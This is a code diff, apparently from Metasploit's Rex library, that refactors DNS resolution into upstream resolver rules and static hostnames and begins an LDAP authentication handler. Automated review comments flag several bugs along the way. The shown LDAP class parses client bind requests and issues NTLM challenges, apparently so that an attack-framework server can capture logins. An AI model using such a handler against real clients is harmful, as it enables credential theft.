|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -0,0 +1,14 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
module Exceptions
|
||||
|
||||
class ConfigError < Rex::RuntimeError
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
+161
-56
@@ -14,11 +14,11 @@ module DNS
|
||||
class Resolver < Net::DNS::Resolver
|
||||
|
||||
Defaults = {
|
||||
:config_file => "/etc/resolv.conf",
|
||||
:config_file => nil,
|
||||
:log_file => File::NULL, # formerly $stdout, should be tied in with our loggers
|
||||
:port => 53,
|
||||
:searchlist => [],
|
||||
:nameservers => [IPAddr.new("127.0.0.1")],
|
||||
:nameservers => [],
|
||||
:domain => "",
|
||||
:source_port => 0,
|
||||
:source_address => IPAddr.new("0.0.0.0"),
|
||||
@@ -30,21 +30,23 @@ module DNS
|
||||
:use_tcp => false,
|
||||
:ignore_truncated => false,
|
||||
:packet_size => 512,
|
||||
:tcp_timeout => 30,
|
||||
:udp_timeout => 30,
|
||||
:tcp_timeout => TcpTimeout.new(5),
|
||||
:udp_timeout => UdpTimeout.new(5),
|
||||
:context => {},
|
||||
:comm => nil
|
||||
:comm => nil,
|
||||
:static_hosts => {}
|
||||
}
|
||||
|
||||
attr_accessor :context, :comm
|
||||
attr_accessor :context, :comm, :static_hostnames
|
||||
#
|
||||
# Provide override for initializer to use local Defaults constant
|
||||
#
|
||||
# @param config [Hash] Configuration options as conusumed by parent class
|
||||
# @param config [Hash] Configuration options as consumed by parent class
|
||||
def initialize(config = {})
|
||||
raise ResolverArgumentError, "Argument has to be Hash" unless config.kind_of? Hash
|
||||
# config.key_downcase!
|
||||
@config = Defaults.merge config
|
||||
@config[:config_file] ||= self.class.default_config_file
|
||||
@raw = false
|
||||
# New logger facility
|
||||
@logger = Logger.new(@config[:log_file])
|
||||
@@ -58,8 +60,6 @@ module DNS
|
||||
# 4) defaults (and /etc/resolv.conf for config)
|
||||
#------------------------------------------------------------
|
||||
|
||||
|
||||
|
||||
#------------------------------------------------------------
|
||||
# Parsing config file
|
||||
#------------------------------------------------------------
|
||||
@@ -74,7 +74,8 @@ module DNS
|
||||
# Parsing arguments
|
||||
#------------------------------------------------------------
|
||||
comm = config.delete(:comm)
|
||||
context = context = config.delete(:context)
|
||||
context = config.delete(:context)
|
||||
static_hosts = config.delete(:static_hosts)
|
||||
config.each do |key,val|
|
||||
next if key == :log_file or key == :config_file
|
||||
begin
|
||||
@@ -83,6 +84,8 @@ module DNS
|
||||
raise ResolverArgumentError, "Option #{key} not valid"
|
||||
end
|
||||
end
|
||||
self.static_hostnames = StaticHostnames.new(hostnames: static_hosts)
|
||||
self.static_hostnames.parse_hosts_file
|
||||
end
|
||||
#
|
||||
# Provides current proxy setting if configured
|
||||
@@ -115,8 +118,18 @@ module DNS
|
||||
#
|
||||
# @return [Array<Array>] A list of nameservers, each with Rex::Socket options
|
||||
#
|
||||
def nameservers_for_packet(_dns_message)
|
||||
@config[:nameservers].map {|ns| [ns.to_s, {}]}
|
||||
def upstream_resolvers_for_packet(_dns_message)
|
||||
@config[:nameservers].map do |ns|
|
||||
UpstreamResolver.create_dns_server(ns.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
def upstream_resolvers_for_query(name, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
name, type, cls = preprocess_query_arguments(name, type, cls)
|
||||
net_packet = make_query_packet(name, type, cls)
|
||||
# This returns a Net::DNS::Packet. Convert to Dnsruby::Message for consistency
|
||||
packet = Rex::Proto::DNS::Packet.encode_drb(net_packet)
|
||||
upstream_resolvers_for_packet(packet)
|
||||
end
|
||||
|
||||
#
|
||||
@@ -128,8 +141,6 @@ module DNS
|
||||
# @return [Dnsruby::Message] DNS response
|
||||
#
|
||||
def send(argument, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
method = self.use_tcp? ? :send_tcp : :send_udp
|
||||
|
||||
case argument
|
||||
when Dnsruby::Message
|
||||
packet = argument
|
||||
@@ -141,46 +152,33 @@ module DNS
|
||||
packet = Rex::Proto::DNS::Packet.encode_drb(net_packet)
|
||||
end
|
||||
|
||||
nameservers = nameservers_for_packet(packet)
|
||||
if nameservers.size == 0
|
||||
raise ResolverError, "No nameservers specified!"
|
||||
|
||||
upstream_resolvers = upstream_resolvers_for_packet(packet)
|
||||
if upstream_resolvers.empty?
|
||||
raise ResolverError, "No upstream resolvers specified!"
|
||||
end
|
||||
|
||||
# Store packet_data for performance improvements,
|
||||
# so methods don't keep on calling Packet#encode
|
||||
packet_data = packet.encode
|
||||
packet_size = packet_data.size
|
||||
|
||||
# Choose whether use TCP, UDP
|
||||
if packet_size > @config[:packet_size] # Must use TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to size"
|
||||
method = :send_tcp
|
||||
else # Packet size is inside the boundaries
|
||||
if use_tcp? or !(proxies.nil? or proxies.empty?) # User requested TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to tcp flag"
|
||||
method = :send_tcp
|
||||
elsif !supports_udp?(nameservers)
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to the presence of a non-UDP-compatible comm channel"
|
||||
method = :send_tcp
|
||||
else # Finally use UDP
|
||||
@logger.info "Sending #{packet_size} bytes using UDP"
|
||||
method = :send_udp unless method == :send_tcp
|
||||
ans = nil
|
||||
upstream_resolvers.each do |upstream_resolver|
|
||||
case upstream_resolver.type
|
||||
when UpstreamResolver::Type::BLACK_HOLE
|
||||
ans = resolve_via_blackhole(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::DNS_SERVER
|
||||
ans = resolve_via_dns_server(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::STATIC
|
||||
ans = resolve_via_static(upstream_resolver, packet, type, cls)
|
||||
when UpstreamResolver::Type::SYSTEM
|
||||
ans = resolve_via_system(upstream_resolver, packet, type, cls)
|
||||
end
|
||||
end
|
||||
|
||||
if type == Dnsruby::Types::AXFR
|
||||
@logger.warn "AXFR query, switching to TCP" unless method == :send_tcp
|
||||
method = :send_tcp
|
||||
break if (ans and ans[0].length > 0)
|
||||
end
|
||||
|
||||
ans = self.__send__(method, packet, packet_data, nameservers)
|
||||
|
||||
unless (ans and ans[0].length > 0)
|
||||
@logger.fatal "No response from nameservers list: aborting"
|
||||
@logger.fatal "No response from upstream resolvers: aborting"
|
||||
raise NoResponseError
|
||||
end
|
||||
|
||||
@logger.info "Received #{ans[0].size} bytes from #{ans[1][2]+":"+ans[1][1].to_s}"
|
||||
# response = Net::DNS::Packet.parse(ans[0],ans[1])
|
||||
response = Dnsruby::Message.decode(ans[0])
|
||||
|
||||
@@ -386,28 +384,135 @@ module DNS
|
||||
#
|
||||
# @return ans [Dnsruby::Message] DNS Response
|
||||
def query(name, type = Dnsruby::Types::A, cls = Dnsruby::Classes::IN)
|
||||
name, type, cls = preprocess_query_arguments(name, type, cls)
|
||||
@logger.debug "Query(#{name},#{Dnsruby::Types.new(type)},#{Dnsruby::Classes.new(cls)})"
|
||||
send(name,type,cls)
|
||||
end
|
||||
|
||||
return send(name,type,cls) if name.class == IPAddr
|
||||
def self.default_config_file
|
||||
%w[
|
||||
/etc/resolv.conf
|
||||
/data/data/com.termux/files/usr/etc/resolv.conf
|
||||
].find do |path|
|
||||
File.file?(path) && File.readable?(path)
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def preprocess_query_arguments(name, type, cls)
|
||||
return [name, type, cls] if name.class == IPAddr
|
||||
|
||||
# If the name doesn't contain any dots then append the default domain.
|
||||
if name !~ /\./ and name !~ /:/ and @config[:defname]
|
||||
name += "." + @config[:domain]
|
||||
end
|
||||
|
||||
@logger.debug "Query(#{name},#{Dnsruby::Types.new(type)},#{Dnsruby::Classes.new(cls)})"
|
||||
|
||||
return send(name,type,cls)
|
||||
|
||||
[name, type, cls]
|
||||
end
|
||||
|
||||
private
|
||||
def resolve_via_dns_server(upstream_resolver, packet, type, _cls)
|
||||
method = self.use_tcp? ? :send_tcp : :send_udp
|
||||
|
||||
def supports_udp?(nameserver_results)
|
||||
nameserver_results.each do |nameserver, socket_options|
|
||||
comm = socket_options.fetch('Comm') { @config[:comm] || Rex::Socket::SwitchBoard.best_comm(nameserver) }
|
||||
next if comm.nil?
|
||||
return false unless comm.supports_udp?
|
||||
# Store packet_data for performance improvements,
|
||||
# so methods don't keep on calling Packet#encode
|
||||
packet_data = packet.encode
|
||||
packet_size = packet_data.size
|
||||
|
||||
# Choose whether use TCP, UDP
|
||||
if packet_size > @config[:packet_size] # Must use TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to size"
|
||||
method = :send_tcp
|
||||
else # Packet size is inside the boundaries
|
||||
if use_tcp? or !(proxies.nil? or proxies.empty?) # User requested TCP
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to tcp flag"
|
||||
method = :send_tcp
|
||||
elsif !supports_udp?(upstream_resolver)
|
||||
@logger.info "Sending #{packet_size} bytes using TCP due to the presence of a non-UDP-compatible comm channel"
|
||||
method = :send_tcp
|
||||
else # Finally use UDP
|
||||
@logger.info "Sending #{packet_size} bytes using UDP"
|
||||
method = :send_udp unless method == :send_tcp
|
||||
end
|
||||
end
|
||||
|
||||
if type == Dnsruby::Types::AXFR
|
||||
@logger.warn "AXFR query, switching to TCP" unless method == :send_tcp
|
||||
method = :send_tcp
|
||||
end
|
||||
|
||||
nameserver = [upstream_resolver.destination, upstream_resolver.socket_options]
|
||||
ans = self.__send__(method, packet, packet_data, [nameserver])
|
||||
|
||||
if (ans and ans[0].length > 0)
|
||||
@logger.info "Received #{ans[0].size} bytes from #{ans[1][2]+":"+ans[1][1].to_s}"
|
||||
end
|
||||
|
||||
ans
|
||||
end
|
||||
|
||||
def resolve_via_blackhole(upstream_resolver, packet, type, cls)
|
||||
# do not just return nil because that will cause the next resolver to be used
|
||||
@logger.info "No response from upstream resolvers: blackholed"
|
||||
raise NoResponseError
|
||||
end
|
||||
|
||||
def resolve_via_static(upstream_resolver, packet, type, cls)
|
||||
simple_name_lookup(upstream_resolver, packet, type, cls) do |name, _family|
|
||||
static_hostnames.get(name, type)
|
||||
end
|
||||
end
|
||||
|
||||
def resolve_via_system(upstream_resolver, packet, type, cls)
|
||||
# This system resolver will use host operating systems `getaddrinfo` (or equivalent function) to perform name
|
||||
# resolution. This is primarily useful if that functionality is hooked or modified by an external application such
|
||||
# as proxychains. This handler though can only process A and AAAA requests.
|
||||
simple_name_lookup(upstream_resolver, packet, type, cls) do |name, family|
|
||||
addrinfos = ::Addrinfo.getaddrinfo(name, 0, family, ::Socket::SOCK_STREAM)
|
||||
addrinfos.map(&:ip_address)
|
||||
end
|
||||
end
|
||||
|
||||
def simple_name_lookup(upstream_resolver, packet, type, cls, &block)
|
||||
return nil unless cls == Dnsruby::Classes::IN
|
||||
|
||||
# todo: make sure this will work if the packet has multiple questions, figure out how that's handled
|
||||
name = packet.question.first.qname.to_s
|
||||
case type
|
||||
when Dnsruby::Types::A
|
||||
family = ::Socket::AF_INET
|
||||
when Dnsruby::Types::AAAA
|
||||
family = ::Socket::AF_INET6
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
ip_addresses = nil
|
||||
begin
|
||||
ip_addresses = block.call(name, family)
|
||||
rescue StandardError => e
|
||||
@logger.error("The #{upstream_resolver.type} name lookup block failed for #{name}")
|
||||
end
|
||||
return nil unless ip_addresses && !ip_addresses.empty?
|
||||
|
||||
message = Dnsruby::Message.new
|
||||
message.add_question(name, type, cls)
|
||||
ip_addresses.each do |ip_address|
|
||||
message.add_answer(Dnsruby::RR.new_from_hash(
|
||||
name: name,
|
||||
type: type,
|
||||
ttl: 0,
|
||||
address: ip_address.to_s
|
||||
))
|
||||
end
|
||||
[message.encode]
|
||||
end
|
||||
|
||||
def supports_udp?(upstream_resolver)
|
||||
return false unless upstream_resolver.type == UpstreamResolver::Type::DNS_SERVER
|
||||
|
||||
comm = upstream_resolver.socket_options.fetch('Comm') { @config[:comm] || Rex::Socket::SwitchBoard.best_comm(upstream_resolver.destination) }
|
||||
return false if comm && !comm.supports_udp?
|
||||
|
||||
true
|
||||
end
|
||||
end # Resolver
|
||||
|
||||
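Review bot: `resolve_via_system` never consults `upstream_resolver.socket_options` or `@config[:comm]`; it calls `::Addrinfo.getaddrinfo` on the local host, so a rule whose resolver is `system` resolves names from the local machine even when that rule carries a comm channel. The existing comment explains the proxychains use case but not this consequence, so I would add `# NOTE: the rule's comm channel is not used here; the lookup is made by the local host's resolver.` above the `simple_name_lookup` call. In `simple_name_lookup` the rescued `e` is never logged, so appending `#{e.class}: #{e.message}` to the error line would make a failed lookup diagnosable.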
@@ -0,0 +1,151 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/socket'
|
||||
require 'forwardable'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This class manages statically defined hostnames for DNS resolution where each name is a mapping to an IPv4 and or
|
||||
# an IPv6 address. A single hostname can only map to one address of each family.
|
||||
##
|
||||
class StaticHostnames
|
||||
extend Forwardable
|
||||
|
||||
def_delegators :@hostnames, :each, :each_with_index, :length, :empty?
|
||||
|
||||
# @param [Hash<String, IPAddr>] hostnames The hostnames to IP address mappings to initialize with.
|
||||
def initialize(hostnames: nil)
|
||||
@hostnames = {}
|
||||
if hostnames
|
||||
hostnames.each do |hostname, ip_address|
|
||||
add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Locate and parse a hosts file on the system. Only the first hostname to IP address definition is used which
|
||||
# replicates the behavior of /etc/hosts on Linux. Loaded definitions are merged with existing definitions.
|
||||
def parse_hosts_file
|
||||
path = %w[
|
||||
%WINDIR%\system32\drivers\etc\hosts
|
||||
/etc/hosts
|
||||
/data/data/com.termux/files/usr/etc/hosts
|
||||
].find do |path|
|
||||
path = File.expand_path(path)
|
||||
File.file?(path) && File.readable?(path)
|
||||
end
|
||||
return unless path
|
||||
|
||||
path = File.expand_path(path)
|
||||
::IO.foreach(path) do |line|
|
||||
words = line.split
|
||||
next unless words.length > 1 && Rex::Socket.is_ip_addr?(words.first)
|
||||
|
||||
ip_address = IPAddr.new(words.shift)
|
||||
words.each do |hostname|
|
||||
add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Get an IP address of the specified type for the hostname. Only the first address is returned in cases where
|
||||
# multiple addresses are defined.
|
||||
#
|
||||
# @param [String] hostname The hostname to retrieve an address for.
|
||||
# @param [Integer] type The family of address to return represented as a DNS type (either A or AAAA).
|
||||
# @return Returns the IP address if it was found, otherwise nil.
|
||||
# @rtype [IPAddr, nil]
|
||||
def get1(hostname, type = Dnsruby::Types::A)
|
||||
get(hostname, type).first
|
||||
end
|
||||
|
||||
# Get all IP addresses of the specified type for the hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname to retrieve an address for.
|
||||
# @param [Integer] type The family of address to return represented as a DNS type (either A or AAAA).
|
||||
# @return Returns an array of IP addresses.
|
||||
# @rtype [Array<IPAddr>]
|
||||
def get(hostname, type = Dnsruby::Types::A)
|
||||
hostname = hostname.downcase
|
||||
@hostnames.fetch(hostname, {}).fetch(type, []).dup
|
||||
end
|
||||
|
||||
# Add an IP address for the specified hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname whose IP address is being defined.
|
||||
# @param [IPAddr, String] ip_address The IP address that is being defined for the hostname. If this value is a
|
||||
# string, it will be converted to an IPAddr instance.
|
||||
def add(hostname, ip_address)
|
||||
unless self.class.is_valid_hostname?(hostname)
|
||||
# it is important to validate the hostname because assumptions about what characters it may contain are made
|
||||
# when saving and loading it from the configuration
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_address = IPAddr.new(ip_address) if ip_address.is_a?(String) && Rex::Socket.is_ip_addr?(ip_address)
|
||||
|
||||
hostname = hostname.downcase
|
||||
this_host = @hostnames.fetch(hostname, {})
|
||||
if ip_address.family == ::Socket::AF_INET
|
||||
type = Dnsruby::Types::A
|
||||
else
|
||||
type = Dnsruby::Types::AAAA
|
||||
end
|
||||
this_type = this_host.fetch(type, [])
|
||||
this_type << ip_address unless this_type.include?(ip_address)
|
||||
this_host[type] = this_type
|
||||
@hostnames[hostname] = this_host
|
||||
nil
|
||||
end
|
||||
|
||||
# Delete an IP address for the specified hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname whose IP address is being undefined.
|
||||
# @param [IPAddr, String] ip_address The IP address that is being undefined. If this value is a string, it will be
|
||||
# converted to an IPAddr instance.
|
||||
def delete(hostname, ip_address)
|
||||
ip_address = IPAddr.new(ip_address) if ip_address.is_a?(String) && Rex::Socket.is_ip_addr?(ip_address)
|
||||
if ip_address.family == ::Socket::AF_INET
|
||||
type = Dnsruby::Types::A
|
||||
else
|
||||
type = Dnsruby::Types::AAAA
|
||||
end
|
||||
|
||||
hostname = hostname.downcase
|
||||
this_host = @hostnames.fetch(hostname, {})
|
||||
this_type = this_host.fetch(type, [])
|
||||
this_type.delete(ip_address)
|
||||
if this_type.empty?
|
||||
this_host.delete(type)
|
||||
else
|
||||
this_host[type] = this_type
|
||||
end
|
||||
if this_host.empty?
|
||||
@hostnames.delete(hostname)
|
||||
else
|
||||
@hostnames[hostname] = this_host
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Delete all hostname to IP address definitions.
|
||||
def flush
|
||||
@hostnames.clear
|
||||
end
|
||||
|
||||
def self.is_valid_hostname?(name)
|
||||
# check if it appears to be a fully qualified domain name, e.g. www.metasploit.com
|
||||
return true if Rex::Socket.is_name?(name)
|
||||
|
||||
# check if it appears to at least be a valid hostname, e.g. localhost
|
||||
return true if (name =~ /^([a-z0-9][a-z0-9\-]{0,61})?[a-z0-9]$/i) && (name =~ /\s/).nil?
|
||||
|
||||
false
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
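Review bot: The Windows candidate in `parse_hosts_file` can never match, because `%w[]` keeps `%WINDIR%\system32\drivers\etc\hosts` as literal text and `File.expand_path` does not expand environment variables, so on Windows the hosts file is silently skipped. Building that candidate from the environment, for example `File.join(ENV['WINDIR'], 'system32', 'drivers', 'etc', 'hosts') if ENV['WINDIR']`, and calling `.compact` on the list before `find` would fix it. In `add` and `delete`, a String that is not an IP address skips the `IPAddr.new` conversion and then fails at `ip_address.family` with a NoMethodError. Adding `raise ::ArgumentError.new("Invalid IP address: #{ip_address}") unless ip_address.is_a?(IPAddr)` after the conversion would report bad input the same way the hostname check does.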
@@ -0,0 +1,76 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This represents a single upstream DNS resolver target of one of the predefined types.
|
||||
##
|
||||
class UpstreamResolver
|
||||
module Type
|
||||
BLACK_HOLE = :"black-hole"
|
||||
DNS_SERVER = :"dns-server"
|
||||
STATIC = :static
|
||||
SYSTEM = :system
|
||||
end
|
||||
|
||||
attr_reader :type, :destination, :socket_options
|
||||
|
||||
# @param [Symbol] type The resolver type.
|
||||
# @param [String] destination An optional destination, as used by some resolver types.
|
||||
# @param [Hash] socket_options Options to use for sockets when connecting to the destination, as used by some
|
||||
# resolver types.
|
||||
def initialize(type, destination: nil, socket_options: {})
|
||||
@type = type
|
||||
@destination = destination
|
||||
@socket_options = socket_options
|
||||
end
|
||||
|
||||
# Initialize a new black-hole resolver.
|
||||
def self.create_black_hole
|
||||
self.new(Type::BLACK_HOLE)
|
||||
end
|
||||
|
||||
# Initialize a new dns-server resolver.
|
||||
#
|
||||
# @param [String] destination The IP address of the upstream DNS server.
|
||||
# @param [Hash] socket_options Options to use when connecting to the upstream DNS server.
|
||||
def self.create_dns_server(destination, socket_options: {})
|
||||
self.new(
|
||||
Type::DNS_SERVER,
|
||||
destination: destination,
|
||||
socket_options: socket_options
|
||||
)
|
||||
end
|
||||
|
||||
# Initialize a new static resolver.
|
||||
def self.create_static
|
||||
self.new(Type::STATIC)
|
||||
end
|
||||
|
||||
# Initialize a new system resolver.
|
||||
def self.create_system
|
||||
self.new(Type::SYSTEM)
|
||||
end
|
||||
|
||||
def to_s
|
||||
if type == Type::DNS_SERVER
|
||||
destination.to_s
|
||||
else
|
||||
type.to_s
|
||||
end
|
||||
end
|
||||
|
||||
def eql?(other)
|
||||
return false unless other.is_a?(self.class)
|
||||
return false unless other.type == type
|
||||
return false unless other.destination == destination
|
||||
return false unless other.socket_options == socket_options
|
||||
true
|
||||
end
|
||||
|
||||
alias == eql?
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
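Review bot: `eql?` and `==` are overridden here without a matching `hash`, so `Array#uniq` and Hash lookups still treat two equal resolvers as distinct objects. This affects the `upstream_resolvers.uniq` and `results_from_all_questions.uniq!` calls in `upstream_resolvers_for_packet`: the fallback path builds fresh objects with `create_dns_server` for every question, so identical nameserver lists from two questions would not collapse to one entry and the `size != 1` branch (its body is outside the visible hunk) would be taken. Adding `def hash; [type, destination, socket_options].hash; end` next to `eql?` keeps the two consistent. `UpstreamRule` defines `eql?` the same way and has the same gap.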
@@ -0,0 +1,104 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'json'
|
||||
require 'rex/socket'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This represents a configuration rule for how names should be resolved. It matches a single wildcard which acts as a
|
||||
# matching condition and maps it to 0 or more resolvers to use for lookups.
|
||||
##
|
||||
class UpstreamRule
|
||||
|
||||
attr_reader :wildcard, :resolvers, :comm
|
||||
# @param [String] wildcard The wildcard pattern to use for conditionally matching hostnames.
|
||||
# @param [Array] resolvers The resolvers to use when this rule is applied.
|
||||
# @param [Msf::Session::Comm] comm The communication channel to use when creating network connections.
|
||||
def initialize(wildcard: '*', resolvers: [], comm: nil)
|
||||
::ArgumentError.new("Invalid wildcard text: #{wildcard}") unless self.class.valid_wildcard?(wildcard)
|
||||
@wildcard = wildcard
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = comm unless comm.nil?
|
||||
@resolvers = resolvers.map do |resolver|
|
||||
if resolver.is_a?(String) && !Rex::Socket.is_ip_addr?(resolver)
|
||||
resolver = resolver.downcase.to_sym
|
||||
end
|
||||
|
||||
case resolver
|
||||
when UpstreamResolver
|
||||
resolver
|
||||
when UpstreamResolver::Type::BLACK_HOLE
|
||||
UpstreamResolver.create_black_hole
|
||||
when UpstreamResolver::Type::STATIC
|
||||
UpstreamResolver.create_static
|
||||
when UpstreamResolver::Type::SYSTEM
|
||||
UpstreamResolver.create_system
|
||||
else
|
||||
if Rex::Socket.is_ip_addr?(resolver)
|
||||
UpstreamResolver.create_dns_server(resolver, socket_options: socket_options)
|
||||
else
|
||||
raise ::ArgumentError.new("Invalid upstream DNS resolver: #{resolver}")
|
||||
end
|
||||
end
|
||||
end
|
||||
@comm = comm
|
||||
end
|
||||
|
||||
# Check whether or not the defined resolver is valid.
|
||||
#
|
||||
# @param [String] resolver The resolver string to check.
|
||||
# @rtype Boolean
|
||||
def self.valid_resolver?(resolver)
|
||||
return true if Rex::Socket.is_ip_addr?(resolver)
|
||||
|
||||
resolver = resolver.downcase.to_sym
|
||||
[
|
||||
UpstreamResolver::Type::BLACK_HOLE,
|
||||
UpstreamResolver::Type::STATIC,
|
||||
UpstreamResolver::Type::SYSTEM
|
||||
].include?(resolver)
|
||||
end
|
||||
|
||||
# Check whether or not the defined wildcard is a valid pattern.
|
||||
#
|
||||
# @param [String] wildcard The wildcard text to check.
|
||||
# @rtype Boolean
|
||||
def self.valid_wildcard?(wildcard)
|
||||
wildcard == '*' || wildcard =~ /^(\*\.)?([a-z\d][a-z\d-]*[a-z\d]\.)+[a-z]+$/
|
||||
end
|
||||
|
||||
# Check whether or not the currently configured wildcard pattern will match all names.
|
||||
#
|
||||
# @rtype Boolean
|
||||
def matches_all?
|
||||
wildcard == '*'
|
||||
end
|
||||
|
||||
# Check whether or not the specified name matches the currently configured wildcard pattern.
|
||||
#
|
||||
# @rtype Boolean
|
||||
def matches_name?(name)
|
||||
if matches_all?
|
||||
true
|
||||
elsif wildcard.start_with?('*.')
|
||||
name.downcase.end_with?(wildcard[1..-1].downcase)
|
||||
else
|
||||
name.casecmp?(wildcard)
|
||||
end
|
||||
end
|
||||
|
||||
def eql?(other)
|
||||
return false unless other.is_a?(self.class)
|
||||
return false unless other.wildcard == wildcard
|
||||
return false unless other.resolvers == resolvers
|
||||
return false unless other.comm == comm
|
||||
true
|
||||
end
|
||||
|
||||
alias == eql?
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
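Review bot: The wildcard check at the top of `initialize` builds an `::ArgumentError` but never raises it, so an invalid wildcard is stored unchanged; the line should read `raise ::ArgumentError.new("Invalid wildcard text: #{wildcard}") unless self.class.valid_wildcard?(wildcard)`. `valid_wildcard?` also anchors its pattern with `^` and `$`, which match at line boundaries in Ruby, so a multi-line string that contains one valid line is accepted; `\A` and `\z` would bind the pattern to the whole string. Both matter because `save_config_upstream_rules` later joins the wildcard into a `;`-separated config value.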
@@ -0,0 +1,342 @@
|
||||
require 'net/ldap'
|
||||
require 'net/ldap/dn'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module LDAP
|
||||
class Auth
|
||||
SUPPORTS_SASL = %w[GSS-SPNEGO NLTM]
|
||||
NTLM_CONST = Rex::Proto::NTLM::Constants
|
||||
NTLM_CRYPT = Rex::Proto::NTLM::Crypt
|
||||
MESSAGE = Rex::Proto::NTLM::Message
|
||||
|
||||
#
|
||||
# Initialize the required variables
|
||||
#
|
||||
# @param challenge [String] NTLM Server Challenge
|
||||
# @param domain [String] Domain value used in NTLM
|
||||
# @param server [String] Server value used in NTLM
|
||||
# @param dnsname [String] DNS Name value used in NTLM
|
||||
# @param dnsdomain [String] DNS Domain value used in NTLM
|
||||
def initialize(challenge, domain, server, dnsname, dnsdomain)
|
||||
@domain = domain.nil? ? 'DOMAIN' : domain
|
||||
@server = server.nil? ? 'SERVER' : server
|
||||
@dnsname = dnsname.nil? ? 'server' : dnsname
|
||||
@dnsdomain = dnsdomain.nil? ? 'example.com' : dnsdomain
|
||||
@challenge = [challenge.nil? ? Rex::Text.rand_text_alphanumeric(16) : challenge].pack('H*')
|
||||
end
|
||||
|
||||
#
|
||||
# Process the incoming LDAP login requests from clients
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def process_login_request(user_login)
|
||||
auth_info = {}
|
||||
|
||||
if user_login.name.empty? && user_login.authentication.empty? # Anonymous
|
||||
auth_info = handle_anonymous_request(user_login, auth_info)
|
||||
elsif !user_login.name.empty? # Simple
|
||||
auth_info = handle_simple_request(user_login, auth_info)
|
||||
elsif sasl?(user_login)
|
||||
auth_info = handle_sasl_request(user_login, auth_info)
|
||||
else
|
||||
auth_info = handle_unknown_request(user_login, auth_info)
|
||||
end
|
||||
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Anonymous authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_anonymous_request(user_login, auth_info = {})
|
||||
if user_login.name.empty? && user_login.authentication.empty?
|
||||
auth_info[:user] = user_login.name
|
||||
auth_info[:pass] = user_login.authentication
|
||||
auth_info[:domain] = nil
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeSuccess
|
||||
auth_info[:auth_type] = 'Anonymous'
|
||||
end
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Unknown authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_unknown_request(user_login, auth_info = {})
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
auth_info[:error_msg] = 'Invalid LDAP Login Attempt => Unknown Authentication Format'
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Simple authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_simple_request(user_login, auth_info = {})
|
||||
domains = []
|
||||
names = []
|
||||
if !user_login.name.empty?
|
||||
if user_login.name =~ /@/
|
||||
pub_info = user_login.name.split('@')
|
||||
if pub_info.length <= 2
|
||||
auth_info[:user], auth_info[:domain] = pub_info
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
end
|
||||
elsif user_login.name =~ /,/
|
||||
begin
|
||||
dn = Net::LDAP::DN.new(user_login.name)
|
||||
dn.each_pair do |key, value|
|
||||
if key == 'cn'
|
||||
names << value
|
||||
elsif key == 'dc'
|
||||
domains << value
|
||||
end
|
||||
end
|
||||
auth_info[:user] = names.join('')
|
||||
auth_info[:domain] = domains.empty? ? nil : domains.join('.')
|
||||
rescue Net::LDAP::InvalidDNError => e
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
raise e
|
||||
end
|
||||
elsif user_login.name =~ /\\/
|
||||
pub_info = user_login.name.split('\\')
|
||||
if pub_info.length <= 2
|
||||
